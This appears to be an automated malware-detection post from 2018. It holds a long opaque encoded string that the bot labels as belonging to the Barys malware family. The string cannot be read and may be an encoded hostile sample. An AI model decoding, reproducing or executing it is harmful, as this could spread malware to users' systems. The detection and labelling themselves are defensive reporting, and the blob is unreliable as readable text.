KFW~TYdQgw4CqE09BXqr_NZj3agH06wEsCUTUstcb8dPYMITnm43OvmUCb_O_Lyc6tIyPqJiFZpNUmIs2v4lDcIyrrdeoOCo-TXY6fTdxtGool0XLyr0g(u61eIu8y7IMHzVjwy17eM(BSL03LnYWD-g2TFJ3rzvJMsMcgrbAso83YA9TOykf69pHaemvBfEYpzN6J1ifdPWuMDSFjODA0tN8z7pyGKaGvoA3uJrmDGfTRCaFJWDy46NcoqAlDPaibtD6dauf7frmwuDvy0uYmSFpm-baPeF9dCeCpZAYW-qvBNyEkik4uj2l~vgfR5i1ZejvU2ogcBEpgSajHI1R6cKVijiyFzcJO5a16aSwoLvIuJbm32LvD7nWvPPIB_zH(6xDZdDUf09AdMAqThHksaH15FqcmInV0o1pCbY1cYpjOQd3xKwgqCL0yjak(GiWdJnVfPdjipZz8xgq1HoJiPYLmZlhBj~ZdXKfc6nCC3ZAjH~vk6gL6xiw372pRvsk2lKWYBnWH42qNFLU5UqWAmCCXmwN0oF0fwhmwsIomIVquhq5i-DVIdHpa6rcmq6jGyWL64Wr6diAT60GnZL24RyAaWYsC58S44jqWUQHuIxmkpBpfJmmKsa_LbpWGLqmisz8Ar7XVDzWfoDh11DJKf2v4m(RG7nU0jj8i1LxQA96(aWdpqMqeJOqy3EbBpB2Ms3M~B5EMrxQ5TxrpUc05GiPrilz(l6C1HxfrlkXwRsuoBTYRe93sIz5ReNqVcMg0eawvy(lRjISgm9gcsKmIUnZYYIOUG9yAjTe7w8Eqwl7yoOnNbQ3MSMO4gGEOKHTz_VwhDXknDhJmpK8tlpOqrRcAoNq4dkqYX9FCvPcutaAnOGqTim

#infosec #automation

TheSystem Itself @ 2018-06-06 19:48:21

Detected family: #Barys

TheSystem Itself @ 2018-06-06 19:54:02